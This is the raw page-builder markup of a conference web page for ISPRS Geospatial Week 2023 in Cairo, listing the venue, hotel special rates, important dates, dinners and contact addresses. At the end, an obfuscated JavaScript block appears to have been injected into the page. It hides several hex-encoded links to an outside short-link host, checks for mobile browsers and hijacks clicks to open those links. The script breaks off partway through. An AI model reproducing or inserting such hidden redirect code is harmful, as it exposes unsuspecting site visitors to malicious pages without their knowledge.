button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 